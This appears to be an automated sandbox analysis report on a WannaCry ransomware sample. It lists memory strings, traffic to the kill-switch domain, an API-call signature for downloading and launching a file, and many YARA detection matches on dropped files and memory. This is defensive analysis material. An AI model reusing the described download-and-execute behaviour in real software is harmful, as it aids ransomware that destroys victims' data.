              Source: svchost.exe, 00000015.00000002.322266508.0000018D7523C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
              Source: svchost.exe, 00000015.00000002.322266508.0000018D7523C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322158111.0000018D75213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
              Source: svchost.exe, 00000015.00000003.299278941.0000018D75231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
              Source: svchost.exe, 00000015.00000003.321748674.0000018D75256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
              Source: svchost.exe, 00000015.00000003.299278941.0000018D75231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
              Source: svchost.exe, 00000015.00000003.299278941.0000018D75231000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322257257.0000018D7523A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
              Source: svchost.exe, 00000015.00000002.322305034.0000018D7524D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321608478.0000018D75240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321726134.0000018D75246000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
              Source: mssecsvc.exe, 00000008.00000002.351072766.0000000000D50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.kryptoslogic.com
              Source: unknownDNS traffic detected: queries for: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC27A7 GetTempFileNameA,CreateFileA,InternetReadFile,WriteFile,CloseHandle,CreateProcessA,InternetCloseHandle,InternetCloseHandle,4_2_00AC27A7
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Detected Wannacry Ransomware
              Source: C:\Windows\tasksche.exeCode function: CreateFileA,GetFileSizeEx,memcmp,GlobalAlloc,_local_unwind2, WANACRY!31_2_004014A6
              Yara detected Wannacry ransomware
              Source: Yara matchFile source: y2jb4FtSNq.dll, type: SAMPLE
              Source: Yara matchFile source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000000.263313016.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000000.264700053.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000000.265661394.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000000.260276885.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.350893467.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.348414559.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.499145703.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000000.269555839.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000000.272462934.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000000.261708466.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000000.268279528.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.275761350.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 6360, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 6500, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 6636, type: MEMORYSTR
              Source: Yara matchFile source: C:\Windows\mssecsvc.exe, type: DROPPED

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: y2jb4FtSNq.dll, type: SAMPLEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: y2jb4FtSNq.dll, type: SAMPLEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 8.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 31.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 31.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 31.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 8.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 8.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 8.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 8.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 8.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 8.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 8.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 8.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 8.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 31.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 31.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 31.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 12.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 12.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 12.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 8.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 8.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 8.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 8.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 8.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 8.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 8.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 8.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 8.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 12.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 12.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 12.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 8.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 8.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 8.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 12.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 12.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 12.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 8.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 8.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 12.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 12.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 12.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 8.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 8.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: 8.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 8.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 8.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 8.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 0000001F.00000000.342404801.000000000040E000.00000008.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 00000008.00000000.265918603.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 00000008.00000000.272553493.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 0000000C.00000000.275826042.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 00000004.00000000.263399045.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 00000008.00000002.348690021.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 00000004.00000000.261795649.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 00000008.00000000.268327554.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 00000004.00000000.260345828.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 00000004.00000002.499291701.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 00000004.00000000.264801473.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 0000000C.00000002.351059064.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 00000008.00000000.269636175.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              PE file has a writeable .text section
              Source: mssecsvc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: y2jb4FtSNq.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
